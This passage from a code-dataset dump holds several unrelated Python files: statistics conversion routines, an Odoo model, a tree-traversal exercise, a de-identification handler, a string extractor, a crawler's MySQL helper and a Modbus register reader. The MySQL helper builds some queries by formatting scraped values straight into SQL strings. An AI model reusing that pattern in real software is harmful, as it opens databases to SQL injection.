into a set of bins\n\n    Parameters\n    ----------\n    in_dist : `qp.Ensemble`\n        Input distributions\n\n    Other Parameters\n    ----------------\n    bins : `np.array`\n        Histogram bin edges\n\n    Returns\n    -------\n    data : `dict`\n        The extracted data\n    \"\"\"\n    bins = kwargs.pop('bins', None)\n    if bins is None: # pragma: no cover\n        raise ValueError(\"To convert using extract_hist_values you must specify bins\")\n    bins, pdfs = in_dist.histogramize(bins)\n    return dict(bins=bins, pdfs=pdfs)\n\n\ndef extract_hist_samples(in_dist, **kwargs):\n    \"\"\"Convert using a set of sampled values that are then histogrammed\n\n    Parameters\n    ----------\n    in_dist : `qp.Ensemble`\n        Input distributions\n\n    Other Parameters\n    ----------------\n    bins : `np.array`\n        Histogram bin edges\n    size : `int`\n        Number of samples to generate\n\n    Returns\n    -------\n    data : `dict`\n        The extracted data\n    \"\"\"\n    bins = kwargs.pop('bins', None)\n    size = kwargs.pop('size', 1000)\n    if bins is None: # pragma: no cover\n        raise ValueError(\"To convert using extract_hist_samples you must specify bins\")\n    samples = in_dist.rvs(size=size)\n\n    def hist_helper(sample):\n        return np.histogram(sample, bins=bins)[0]\n    vv = np.vectorize(hist_helper, signature=\"(%i)->(%i)\" % (samples.shape[0], bins.size-1))\n    pdfs = vv(samples)\n    return dict(bins=bins, pdfs=pdfs)\n\n\ndef extract_quantiles(in_dist, **kwargs):\n    \"\"\"Convert using a set of quantiles and the locations at which they are reached\n\n    
Parameters\n    ----------\n    in_dist : `qp.Ensemble`\n        Input distributions\n\n    Other Parameters\n    ----------------\n    quants : `np.array`\n        Quantile values to use\n\n    Returns\n    -------\n    data : `dict`\n        The extracted data\n    \"\"\"\n    quants = kwargs.pop('quants', None)\n    if quants is None: # pragma: no cover\n        raise ValueError(\"To convert using extract_quantiles you must specify quants\")\n    locs = in_dist.ppf(quants)\n    return dict(quants=quants, locs=locs)\n\n\ndef extract_fit(in_dist, **kwargs): # pragma: no cover\n    \"\"\"Convert to a functional distribution by fitting it to a set of x and y values\n\n    Parameters\n    ----------\n    in_dist : `qp.Ensemble`\n        Input distributions\n\n    Other Parameters\n    ----------------\n    xvals : `np.array`\n        Locations at which the pdf is evaluated\n\n    Returns\n    -------\n    data : `dict`\n        The extracted data\n    \"\"\"\n    raise NotImplementedError('extract_fit')\n    #xvals = kwargs.pop('xvals', None)\n    #if xvals is None:\n    #    raise ValueError(\"To convert using extract_fit you must specify xvals\")\n    ##vals = in_dist.pdf(xvals)\n\n\ndef extract_mixmod_fit_samples(in_dist, **kwargs):\n    \"\"\"Convert to a mixture model using a set of values sampled from the pdf\n\n    Parameters\n    ----------\n    in_dist : `qp.Ensemble`\n        Input distributions\n\n    Other Parameters\n    ----------------\n    ncomps : `int`\n        Number of components in mixture model to use\n    nsamples : `int`\n        Number of samples to generate\n    random_state : `int`\n        Used to reproducibly generate random variates from in_dist\n\n    Returns\n    -------\n    data : `dict`\n        The extracted data\n    \"\"\"\n    n_comps = kwargs.pop('ncomps', 3)\n    n_sample = kwargs.pop('nsamples', 1000)\n    random_state = kwargs.pop('random_state', None)\n    samples = in_dist.rvs(size=n_sample, random_state=random_state)\n    def mixmod_helper(samps):\n        estimator = mixture.GaussianMixture(n_components=n_comps)\n        estimator.fit(samps.reshape(-1, 1))\n        weights = estimator.weights_\n        means = estimator.means_[:, 0]\n        stdevs = np.sqrt(estimator.covariances_[:, 0, 0])\n        ov = np.vstack([weights, means, stdevs])\n        return ov\n\n    vv = np.vectorize(mixmod_helper, signature=\"(%i)->(3,%i)\" % (n_sample, n_comps))\n    fit_vals = vv(samples)\n    return dict(weights=fit_vals[:, 0, :], means=fit_vals[:, 1, :], stds=fit_vals[:, 2, :])\n\ndef extract_voigt_mixmod(in_dist, **kwargs): #pragma: no cover\n    \"\"\"Convert to a voigt mixture model starting with a gaussian mixture model,\n    trivially by setting gammas to 0\n\n    Parameters\n    ----------\n    in_dist : `qp.Ensemble`\n        Input distributions\n\n    Returns\n    -------\n    data : `dict`\n        The extracted data\n    \"\"\"\n    objdata = in_dist.objdata()\n    means = objdata['means']\n    stds = objdata['stds']\n    weights = objdata['weights']\n    gammas = np.zeros_like(means)\n    return dict(means=means, stds=stds, weights=weights, gammas=gammas, **kwargs)\n\n\ndef extract_voigt_xy(in_dist, **kwargs): #pragma: no cover\n    \"\"\"Build a voigt function basis and run a match-pursuit algorithm to fit gridded data\n\n    Parameters\n    ----------\n    in_dist : `qp.Ensemble`\n        Input distributions\n\n    Returns\n    -------\n    data : `dict`\n        The extracted data as shaped parameters means, stds, weights, gammas\n    \"\"\"\n\n    sparse_results = extract_voigt_xy_sparse(in_dist, **kwargs)\n    indices = sparse_results['indices']\n    meta = sparse_results['metadata']\n\n    w, m, s, g = indices2shapes(indices, meta)\n    return dict(means=m, stds=s, weights=w, gammas=g)\n\n\ndef extract_voigt_xy_sparse(in_dist, **kwargs): #pragma: no cover\n    \"\"\"Build a voigt function basis and run a match-pursuit 
algorithm to fit gridded data\n\n    Parameters\n    ----------\n    in_dist : `qp.Ensemble`\n        Input distributions\n\n    Returns\n    -------\n    data : `dict`\n        The extracted data as sparse indices and the metadata needed to rebuild the basis\n    \"\"\"\n\n    yvals = in_dist.objdata()['yvals']\n\n    default = in_dist.metadata()['xvals'][0]\n    z = kwargs.pop('xvals', default)\n    nz = kwargs.pop('nz', 300)\n\n    minz = np.min(z)\n    _, j = np.where(yvals > 0)\n    maxz = np.max(z[j])\n    newz = np.linspace(minz, maxz, nz)\n    interp = sciinterp.interp1d(z, yvals, assume_sorted=True)\n    newpdf = interp(newz)\n    newpdf = newpdf / sciint.trapz(newpdf, newz).reshape(-1, 1)\n    ALL, bigD, _ = build_sparse_representation(newz, newpdf)\n    return dict(indices=ALL, metadata=bigD)\n\ndef extract_sparse_from_xy(in_dist, **kwargs): #pragma: no cover\n    \"\"\"Extract sparse representation from an xy interpolated representation\n\n    Parameters\n    ----------\n    in_dist : `qp.Ensemble`\n        Input distributions\n\n    Other Parameters\n    ----------------\n    yvals : array-like\n        Used to override the y-values\n    xvals : array-like\n        Used to override the x-values\n    nvals : int\n        Used to override the number of bins\n\n    Returns\n    -------\n    metadata : `dict`\n        Dictionary with data for sparse representation\n\n    Notes\n    -----\n    This function will rebin to a grid more suited to the in_dist support by\n    removing x-values corresponding to y=0\n    \"\"\"\n    default = in_dist.objdata()['yvals']\n    yvals = kwargs.pop('yvals', default)\n    default = in_dist.metadata()['xvals'][0]\n    xvals = kwargs.pop('xvals', default)\n    nvals = kwargs.pop('nvals', 300)\n    #rebin to a grid more suited to the in_dist support\n    xmin = np.min(xvals)\n    _, j = np.where(yvals > 0)\n    xmax = np.max(xvals[j])\n    newx = np.linspace(xmin, xmax, nvals)\n    interp = sciinterp.interp1d(xvals, yvals, assume_sorted=True)\n    newpdf = interp(newx)\n    sparse_indices, metadata, _ = build_sparse_representation(newx, newpdf)\n    metadata['xvals'] = newx\n    metadata['sparse_indices'] = sparse_indices\n    metadata.pop('Ntot')\n    return metadata\n\n\ndef extract_xy_sparse(in_dist, **kwargs): #pragma: no cover\n    \"\"\"Extract xy-interpolated representation from a sparse representation\n\n    Parameters\n    ----------\n    in_dist : `qp.Ensemble`\n        Input distributions\n\n    Other Parameters\n    ----------------\n    xvals : array-like\n        Used to override the x-values\n    nvals : int\n        Used to override the number of bins\n\n    Returns\n    -------\n    metadata : `dict`\n        Dictionary with data for interpolated representation\n\n    Notes\n    -----\n    This function will rebin to a grid more suited to the in_dist support by\n    removing x-values corresponding to y=0\n    \"\"\"\n\n    yvals = in_dist.objdata()['yvals']\n    default = in_dist.metadata()['xvals'][0]\n    xvals = kwargs.pop('xvals', default)\n    nvals = kwargs.pop('nvals', 300)\n    #rebin to a grid more suited to the in_dist support\n    xmin = np.min(xvals)\n    _, j = np.where(yvals > 0)\n    xmax = np.max(xvals[j])\n    newx = np.linspace(xmin, xmax, nvals)\n    interp = sciinterp.interp1d(xvals, yvals, assume_sorted=True)\n    newpdf = interp(newx)\n    sparse_indices, sparse_meta, A = build_sparse_representation(newx, newpdf)\n    #decode the sparse indices into basis indices and weights\n    basis_indices, weights = decode_sparse_indices(sparse_indices)\n    #retrieve the weighted array of basis functions for each object\n    pdf_y = A[:, basis_indices] * weights\n    #normalize and sum the weighted pdfs\n    x = sparse_meta['z']\n    y = pdf_y.sum(axis=-1)\n    norms = sciint.trapz(y.T, x)\n    y /= norms\n    #super(sparse_gen, 
self).__init__(x, y.T, *args, **kwargs)\n    xvals = x\n    yvals = y.T\n    return dict(xvals=xvals, yvals=yvals, **kwargs)\n","sub_path":"src/qp/conversion_funcs.py","file_name":"conversion_funcs.py","file_ext":"py","file_size_in_byte":11606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"263986994","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass MouvementStock(models.Model):\n\n    _name = 'gctjara.mvtstock'\n    \n    _rec_name = 'numero'\n    \n    numero = fields.Char(\n        string='Numero mvt',\n        default=lambda self: self.env['ir.sequence'].next_by_code('gctjara.mvtstock.seq'))\n    \n    date = fields.Date(\n        string='Date de Mvt',\n        # use a callable so the default is evaluated per record, not once at server start\n        default=fields.Date.today\n    )\n    \n    quantite = fields.Integer(\n        string='Qte.'\n    )\n    \n    quantitetot = fields.Float(\n        string='Qte. Tôt.',\n        digits=(16, 1),\n        default=0.0,\n        store=True\n    )\n    \n    produit = fields.Many2one(\n        string='Produits',\n        comodel_name='gctjara.produitemballee'\n    )\n    type=fields.Char(\n        string='Type')\n    \n    bonentree_id=fields.Many2one(\n        string='Réf bon d\\'entrée',\n        comodel_name='gctjara.bonentree'\n    )\n    bonlivraison_id=fields.Many2one(\n        string='Réf bon de livraison',\n        comodel_name='gctjara.bonlivraison'\n    )\n","sub_path":"models/MouvementStock.py","file_name":"MouvementStock.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"88903443","text":"\"\"\"Created by sgoswami on 8/8/17.\"\"\"\n\"\"\"Given a binary tree, return the zigzag level order traversal of its nodes' values. (ie, from left to right, then \nright to left for the next level and alternate between).\"\"\"\n\nimport collections\n\n\nclass BST:\n    def __init__(self):\n        self.root = None\n\n    def add(self, item):\n        self.root = self.insert_helper(self.root, item)\n        return self.root\n\n    def insert_helper(self, root, item):\n        if root is None:\n            root = TreeNode(item)\n            return root\n        if item < root.val:\n            root.left = self.insert_helper(root.left, item)\n        else:\n            root.right = self.insert_helper(root.right, item)\n        return root\n\n    def inorder(self):\n        self.inorder_helper(self.root)\n\n    def inorder_helper(self, root):\n        if root is None:\n            return\n        self.inorder_helper(root.left)\n        print(root.val, end=', ')\n        self.inorder_helper(root.right)\n\n\nclass TreeNode(object):\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\n\nclass Solution(object):\n    def zigzagLevelOrder(self, root):\n        \"\"\"\n        :type root: TreeNode\n        :rtype: List[List[int]]\n        \"\"\"\n        res = []\n        queue = collections.deque()\n        delimiter = '#'\n        trigger = False\n        queue.appendleft(root)\n        queue.appendleft(delimiter)\n        level = collections.deque()\n        while len(queue) > 0:\n            curr = queue.pop()\n            if curr == delimiter:\n                res.append(list(level))\n                level = collections.deque()\n                if len(queue) > 0:\n                    queue.appendleft(delimiter)\n                trigger = not trigger\n            else:\n                level.append(curr.val)\n                if trigger:\n                    if curr.right:\n                        queue.appendleft(curr.right)\n                    if curr.left:\n                        queue.appendleft(curr.left)\n                else:\n                    if curr.left:\n                        queue.appendleft(curr.left)\n                    if curr.right:\n                        queue.appendleft(curr.right)\n        return res\n\n\nif __name__ == '__main__':\n    bst = BST()\n    bst.add(9)\n    bst.add(3)\n    bst.add(20)\n    bst.add(15)\n    bst.add(21)\n    solution = Solution()\n    
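# Editorial sketch (hedged addition, not part of the original solution): sanity-check\n    # the helper BST before the zigzag call -- an inorder traversal of a BST should print\n    # the values inserted above in ascending order.\n    bst.inorder()\n    print()\n    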
print(solution.zigzagLevelOrder(bst.root))","sub_path":"python/binary_tree_zigzag_level_order_traversal.py","file_name":"binary_tree_zigzag_level_order_traversal.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"71796396","text":"import json\nimport hashlib\nimport base64\nimport logging\nimport uuid\n\ndef hash_message(message, entity_map):\n hashed_message = hashlib.sha256(message.encode()).hexdigest()\n return hashed_message\n\ndef deidentify_entities_in_message(message, entity_list):\n entity_map = dict()\n for entity in entity_list:\n salted_entity = entity['Text'] + str(uuid.uuid4())\n hashkey = hashlib.sha256(salted_entity.encode()).hexdigest()\n entity_map[hashkey] = entity['Text']\n message = message.replace(entity['Text'], hashkey)\n return message, entity_map\n\ndef main(event):\n print('Received message payload')\n try:\n # Extract the entities and message from the event\n message = event['body']['message']\n entity_list = event['body']['entities']\n # Mask entities\n deidentified_message, entity_map = deidentify_entities_in_message(message, entity_list)\n hashed_message = hash_message(deidentified_message, entity_map)\n body = {\"deid_message\": deidentified_message,\"hashed_message\": hashed_message}\n response = {'statusCode':200, 'body':body}\n return response\n except Exception as e:\n logging.error('Exception: %s. Unable to extract entities from message' % e)\n raise e\n","sub_path":"applications/phi-data/ow/deidentify.py","file_name":"deidentify.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"96591054","text":"# for Python >= 3\n# see LICENSE file for licensing information\n\nimport re\nimport sys\nimport string\nimport ngram\n\nN_PRINT = 4\t# minimum number of printable chars to look for\n\nX = '0123456789abcdefghijklmnopqrstuvwxyz'\n\ndef code(s):\n\trv = ''\n\tfor i in range(len(s)-1):\n\t\tpair = s[i:i+2]\n\t\tdiff = abs(ord(pair[0]) - ord(pair[1]))\n\t\ttry:\n\t\t\trv += X[diff]\n\t\texcept IndexError:\n\t\t\treturn '!'\n\treturn rv\n\n# 1st \"derivative\"\nyawn = re.compile(r'(^.00+$) | (^00+.$) | (^11+$) | (.*000) | (.*11111) | (.*22222) | (.*33333) | (.*44444) | (.*55555) | (.*66666) | (.*77777) | (.*88888) | (.*99999)',\n\t\t\tre.VERBOSE|re.DOTALL)\n# 2nd \"derivative\"\nyawn2 = re.compile(r'(^.00+$) | (^00+.$) | (^11+$) | (.*000) | (.*1111) | (.*2222) | (.*3333) | (.*4444) | (.*5555) | (.*6666) | (.*7777) | (.*8888) | (.*9999)',\n\t\t\tre.VERBOSE|re.DOTALL)\n\ndef boring(s):\n\t# too short?\n\tif len(s) < N_PRINT:\n\t\treturn True\n\t# no vowels?\n\tfor ch in s:\n\t\tif ch in 'AEIOUYaeioiuy':\n\t\t\tbreak\n\telse:\n\t\treturn True\n\tif yawn.match(code(s)) is not None:\n\t\treturn True\n\tif yawn2.match(code(code(s))) is not None:\n\t\treturn True\n\treturn False\n\ndef filter_trigram(s):\n\tfor i in range(len(s)-2):\n\t\ttri = s[i:i+3]\n\t\tif tri in ngram.TRIGRAMS:\n\t\t\t# ignore low-frequency trigrams\n\t\t\tif ngram.TRIGRAMS[tri] < 75:\n\t\t\t\tcontinue\n\t\t\treturn True\n\treturn False\n\t\n# can't make this .+ or .* because it can capture the patterns we want\npattern = re.compile(r'( [A-Z][A-Z]+ ) | ( [a-z][a-z]+ ) | ( . 
)',\n\t\t\tre.VERBOSE|re.DOTALL)\n\ndef process(ps, label):\n\tL = []\n\tinteresting = False\n\tps = str(ps, 'ISO-8859-1')\t\t# sigh\n\tfor mo in re.finditer(pattern, ps):\n\t\tbold = False\n\t\tif mo.groups()[0] is not None:\n\t\t\t# uppercase alpha\n\t\t\ts = mo.groups()[0].lower()\n\t\t\tif not boring(s):\n\t\t\t\tif filter_trigram(s):\n\t\t\t\t\tinteresting = True\n\t\t\t\t\tbold = True\n\t\telif mo.groups()[1] is not None:\n\t\t\t# lowercase alpha\n\t\t\ts = mo.groups()[1].lower()\n\t\t\tif not boring(s):\n\t\t\t\tif filter_trigram(s):\n\t\t\t\t\tinteresting = True\n\t\t\t\t\tbold = True\n\t\telse:\n\t\t\t# nothing to see here\n\t\t\tpass\n\t\tL.append( (bold, mo.group(0)) )\n\n\tif interesting:\n\t\tif label is not None:\n\t\t\tprint('[', label, '] ', end='')\n\t\tfor bold, s in L:\n\t\t\tif not bold:\n\t\t\t\tsys.stdout.write(s)\n\t\t\telse:\n\t\t\t\tfor ch in s:\n\t\t\t\t\t# this emboldens in less (the pager)\n\t\t\t\t\tsys.stdout.write(ch)\n\t\t\t\t\t### uncomment for bold output\n\t\t\t\t\t#sys.stdout.write('\\b')\n\t\t\t\t\t#sys.stdout.write(ch)\n\t\t\t\t\t###\n\t\tsys.stdout.write('\\n')\n\n# newlines are annoying in line-based output; remove them\nprintable = ''.join([ch for ch in string.printable if ch != '\\n'])\n# Python 3 is such a joy\nprintable = bytes(printable, 'ISO-8859-1')\n\ndef newfile(file):\n\t# this is broken out so we can retain seen's contents across\n\t# multiple obfuscation candidates (when called by obfus engine)\n\tglobal seen\n\tseen = {}\n\ndef filter_printable(s, label=None):\n\tstart = 0\n\tisprintable = True\n\ts += b'\\xff'\t\t\t# append unprintable sentinel\n\tfor i in range(len(s)):\n\t\tif not isprintable:\n\t\t\tif s[i] in printable:\n\t\t\t\tstart = i\n\t\t\t\tisprintable = True\n\t\telse:\n\t\t\tif s[i] not in printable:\n\t\t\t\tisprintable = False\n\t\t\t\tif i-start >= N_PRINT:\n\t\t\t\t\t# canonicalize case so we don't\n\t\t\t\t\t# see a string candidate in both\n\t\t\t\t\t# upper and lower case\n\t\t\t\t\tkey = s[start:i].lower()\n\t\t\t\t\tif key not in seen:\n\t\t\t\t\t\tprocess(s[start:i], label)\n\t\t\t\t\t\tseen[key] = True\n\nif __name__ == '__main__':\n\tfor file in sys.argv[1:]:\n\t\t#print('==>', file, '<==')\n\t\ttry:\n\t\t\tf = open(file, 'rb')\n\t\t\ts = f.read()\n\t\t\tf.close()\n\t\texcept IOError as e:\n\t\t\tsys.stderr.write('%s: %s\\n' % (file, e.strerror))\n\t\t\tcontinue\n\t\tnewfile(file)\n\t\tfilter_printable(s)\n","sub_path":"training_data/stringlish.py","file_name":"stringlish.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"174372214","text":"\"\"\"\n@ProjectName: DXY-2019-nCov-Crawler\n@FileName: db.py\n@Author: Jiabao Lin\n@Date: 2020/1/21\n\"\"\"\n\nimport pymysql\nfrom app.libs.mysqlconn import POOL\n\n\nclass DB:\n def __init__(self):\n self.db = None\n self.cursor = None\n\n def insert(self, collection, data):\n sql, params = self.get_insert_sql(collection, data)\n self.cursor.execute(sql, params)\n self.db.commit()\n\n def update(self, collection, data):\n sql = self.get_update_sql(collection, data)\n self.cursor.execute(sql)\n self.db.commit()\n\n def open_cursor(self):\n if not self.cursor and not self.db:\n self.db = POOL.connection()\n self.cursor = self.db.cursor(pymysql.cursors.DictCursor)\n\n def close_cursor(self, keep_cursor=False):\n if self.cursor and keep_cursor is False:\n self.cursor.close()\n self.db.close()\n self.cursor = None\n self.db = None\n return True\n else:\n return False\n\n 
@staticmethod\n def get_insert_sql(collection, data):\n sql = \"\"\n params = ()\n if collection == \"DXYArea\":\n sql = \"\"\"\n INSERT INTO area(country, provinceName, provinceShortName, confirmedCount, suspectedCount,\n curedCount, deadCount, comment, cities, updateTime, continents)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n params = (\n data['country'], data['provinceName'], data[\"provinceShortName\"], data[\"confirmedCount\"],\n data['suspectedCount'], data['curedCount'], data['deadCount'], data['comment'], data['cities'],\n data['updateTime'], data['continents']\n )\n\n elif collection == \"DXYOverall\":\n sql = \"\"\"\n INSERT INTO overall(countRemark, virus, infectSource, passWay, remark1,\n remark2, remark3, remark4, remark5, confirmedCount, suspectedCount, curedCount, deadCount, updateTime)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n params = (\n data['countRemark'], data['virus'], data['infectSource'], data['passWay'], data['remark1'],\n data['remark2'], data['remark3'], data['remark4'], data['remark5'], data['confirmedCount'],\n data['suspectedCount'], data['curedCount'], data['deadCount'], data['updateTime']\n )\n\n elif collection == 'location':\n sql = \"\"\"\n INSERT INTO location(province, city, district, address, longitude, latitude, count)\n VALUES (%s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n params = (\n data['province'], data['city'], data['district'], data['address'], str(data['longitude']),\n str(data['latitude']), str(data['count'])\n )\n\n elif collection == 'day_add_list':\n sql = \"\"\"\n INSERT INTO daily(confirm, suspect, dead, heal, deadRate, healRate, Tdate)\n VALUES (%s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n\n params = (\n data['confirm'], data['suspect'], data['dead'], data['heal'], data['deadRate'], data['healRate'],\n data['date']\n )\n\n elif collection == 'day_list':\n sql = \"\"\"\n INSERT INTO dayList(confirm, suspect, dead, heal, deadRate, healRate, Tdate)\n VALUES (%s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n\n params = (\n data['confirm'], data['suspect'], data['dead'], data['heal'], data['deadRate'], data['healRate'],\n data['date']\n )\n\n return sql, params\n\n def is_repeat(self, collection, data):\n sql = ''\n if collection == \"DXYOverall\":\n sql = \"\"\"\n SELECT confirmedCount, suspectedCount, curedCount, deadCount\n FROM overall\n WHERE confirmedCount={} and suspectedCount={} and curedCount={} and deadCount={}\n \"\"\".format(str(data['confirmedCount']),\n str(data['suspectedCount']), str(data['curedCount']), str(data['deadCount']))\n elif collection == \"DXYArea\":\n sql = \"\"\"\n SELECT provinceName, confirmedCount, suspectedCount, curedCount, deadCount\n FROM area\n WHERE provinceName=\\\"{}\\\" and confirmedCount={} and suspectedCount={} and curedCount={} and deadCount={}\n \"\"\".format(data['provinceName'], str(data['confirmedCount']),\n str(data['suspectedCount']), str(data['curedCount']), str(data['deadCount']))\n\n elif collection == 'location':\n sql = \"\"\"\n SELECT *\n FROM location\n WHERE province =\\\"{}\\\" and city={} and district={} and address =\\\"{}\\\" and longitude={} and latitude={}\n \"\"\".format(data['province'], data['city'], data['district'], data['address'], str(data['longitude']),\n str(data['latitude']))\n\n elif collection == 'day_add_list':\n sql = \"\"\"\n SELECT *\n FROM daily\n WHERE Tdate=\\\"{}\\\"\n \"\"\".format(data['date'])\n\n elif collection == 'day_list':\n sql = \"\"\"\n SELECT *\n FROM dayList\n WHERE Tdate=\\\"{}\\\"\n 
\"\"\".format(data['date'])\n\n try:\n self.cursor.execute(sql)\n is_repeat = self.cursor.fetchall()\n except:\n is_repeat = False\n if is_repeat:\n return True\n else:\n return False\n\n @staticmethod\n def get_update_sql(collection, data):\n sql = ''\n\n if collection == 'location':\n sql = \"\"\"\n UPDATE location \n SET count=\\\"{}\\\"\n WHERE address =\\\"{}\\\" and longitude={} and latitude={}\n \"\"\".format(data['count'], data['address'], str(data['longitude']), str(data['latitude']))\n\n return sql\n","sub_path":"service/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":6146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"359563925","text":"#!/usr/bin/env python\r\n\r\n#Esto lo agregué\r\nfrom pymodbus.client.sync import ModbusTcpClient\r\nfrom urllib.parse import urlencode\r\nfrom urllib.request import Request, urlopen\r\nimport requests\r\nimport administracion_de_tareas\r\nimport time\t \r\n#import broker\r\n\r\nfrom tornado.websocket import websocket_connect\r\nimport asyncio\r\nimport json\r\n\r\n#import msvcrt\r\n\r\n#Esto no lo modifiqué\r\nimport logging\r\nimport json\r\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\nlogging.getLogger().setLevel(logging.INFO)\r\n\r\n#from asyncproc import ProcessManager\r\n\r\n#manager = ProcessManager()\r\n\r\n#Esto lo agregué\r\nAPI_ENDPOINT=\"http://127.0.0.1:5510/endpointdata\"\r\nurl = \"ws://localhost:5500/patin\"\r\ndef listToString(s):\r\n str1=''\r\n i=0\r\n for ele in s:\r\n if i<1: str1+=chr(ele)\r\n elif i<2: str1+=chr(ele)+'-'\r\n elif i<3: str1+=chr(ele)\r\n elif i<4: str1+=chr(ele)+'-'\r\n elif i<5: str1+=chr(ele)\r\n elif i<6: str1+=chr(ele)+' '\r\n elif i<7: str1+=chr(ele)\r\n elif i<8: str1+=chr(ele)+':'\r\n elif i<9: str1+=chr(ele)\r\n elif i<10: str1+=chr(ele)+':'\r\n else: str1+=chr(ele)\r\n i=i+1\r\n return str1\r\n\r\ndef formato_flujo(n):\r\n return (\"{0:04.2f}\".format(float(n) ) ).zfill(7)\r\n\r\ndef formato_temperatura(n):\r\n return (\"{0:02.2f}\".format( float(n) )).zfill(5)\r\n\r\n\r\nasync def main():\r\n try:\r\n conn = await websocket_connect(url)\r\n client=ModbusTcpClient('192.168.0.200')\r\n #client.connect()\r\n\r\n while 1:\r\n \"\"\"\r\n if client.connect():\r\n #Fecha y hora\r\n timeStamp=client.read_holding_registers(0x0023,12,unit=1)\r\n #5.2.1. Preset quantity in whole units\r\n GOVsolicitado=client.read_holding_registers(4036,2,unit=1)\r\n #5.2.10. Component delivered gross quantity in whole units\r\n GOVcomponente=client.read_holding_registers(4372,2,unit=1)\r\n #5.2.8. Meter delivered gross quantity in whole units\r\n GOVtotal=client.read_holding_registers(4192,2,unit=1)\r\n #5.2.11. Component delivered net quantity in whole units\r\n GSV=client.read_holding_registers(4564,2,unit=1)\r\n #5.2.7. Preset gross flow rate in whole units\r\n flujoPreset=client.read_holding_registers(4180,2,unit=1)\r\n #5.2.9. Meter gross flow rate in whole units\r\n flujoTR=client.read_holding_registers(4312,2,unit=1)\r\n #5.2.13. Component batch average pressure in tenths or hundredths\r\n presionPreset=client.read_holding_registers(4948,2,unit=1)\r\n #5.2.16. Component current pressure in hundredths\r\n presionTR=client.read_holding_registers(4948,2,unit=1)\r\n #5.2.17. Component current density in tenths\r\n densidadTR=client.read_holding_registers(5716,2,unit=1)\r\n #5.2.14. 
Component batch average density/relative density/gravity\r\n densidadComponent=client.read_holding_registers(5140,2,unit=1)\r\n #5.2.15. Component current temp in hundredths\r\n temperaturaTRrgl=client.read_holding_registers(5332,2,unit=1)\r\n temperaturaTRprm=client.read_holding_registers(5334,2,unit=1)\r\n #5.2.4. Preset batch average temp in tenths or hundredths\r\n temperaturaAvg=client.read_holding_registers(4108,2,unit=1)\r\n #5.2.22. Component current mass delivered\r\n masaTR=client.read_holding_registers(6868,2,unit=1)\r\n #5.2.20. Component current BSW hund\r\n BSWTR=client.read_holding_registers(6484,2,unit=1)\r\n #5.2.22. Component current API gravity tenths\r\n gravidadTR=client.read_holding_registers(6676,2,unit=1)\r\n #Meter k-factor\r\n kFactor=client.read_holding_registers(1770,2,unit=1)\r\n\r\n if temperaturaTRprm.registers[0]!=0:\r\n producto=\"premium\"\r\n else:\r\n producto=\"regular\"\r\n else:\r\n timeStamp.registers[0]=[0,0]\r\n GOVsolicitado.registers[0]=0\r\n GOVcomponente.registers[0]=0\r\n GOVtotal.registers[0]=0\r\n GSV.registers[0]=0\r\n flujoPreset.registers[0]=0\r\n flujoTR.registers[0]=0\r\n presionPreset.registers[0]=0\r\n presionTR.registers[0]=0\r\n densidadTR.registers[0]=0\r\n densidadComponent.registers[0]=0\r\n temperaturaTRrgl.registers[0]=0\r\n temperaturaTRprm.registers[0]=0\r\n temperaturaAvg.registers[0]=0\r\n masaTR.registers[0]=0\r\n BSWTR.registers[0]=0\r\n gravidadTR.registers[0]=0\r\n kFactor.registers[0]=0\r\n producto=\"regular\"\t\r\n \"\"\"\r\n\r\n\r\n client.connect()\r\n #Fecha y hora\r\n timeStamp=client.read_holding_registers(0x0023,12,unit=1)\r\n #5.2.1. Preset quantity in whole units\r\n GOVsolicitado=client.read_holding_registers(4036,2,unit=1)\r\n #5.2.10. Component delivered gross quantity in whole units\r\n GOVcomponente=client.read_holding_registers(4372,2,unit=1)\r\n #5.2.8. Meter delivered gross quantity in whole units\r\n GOVtotal=client.read_holding_registers(4192,2,unit=1)\r\n #5.2.11. Component delivered net quantity in whole units\r\n GSV=client.read_holding_registers(4564,2,unit=1)\r\n #5.2.7. Preset gross flow rate in whole units\r\n flujoPreset=client.read_holding_registers(4180,2,unit=1)\r\n #5.2.9. Meter gross flow rate in whole units\r\n flujoTR=client.read_holding_registers(4312,2,unit=1)\r\n #5.2.13. Component batch average pressure in tenths or hundredths\r\n presionPreset=client.read_holding_registers(4948,2,unit=1)\r\n #5.2.16. Component current pressure in hundredths\r\n presionTR=client.read_holding_registers(4948,2,unit=1)\r\n #5.2.17. Component current density in tenths\r\n densidadTR=client.read_holding_registers(5716,2,unit=1)\r\n #5.2.14. Component batch average density/relative density/gravity\r\n densidadComponent=client.read_holding_registers(5140,2,unit=1)\r\n #5.2.15. Component current temp in hundredths\r\n temperaturaTRrgl=client.read_holding_registers(5332,2,unit=1)\r\n temperaturaTRprm=client.read_holding_registers(5334,2,unit=1)\r\n #5.2.4. Preset batch average temp in tenths or hundredths\r\n temperaturaAvg=client.read_holding_registers(4108,2,unit=1)\r\n #5.2.22. Component current mass delivered\r\n masaTR=client.read_holding_registers(6868,2,unit=1)\r\n #5.2.20. Component current BSW hund\r\n BSWTR=client.read_holding_registers(6484,2,unit=1)\r\n #5.2.22. 
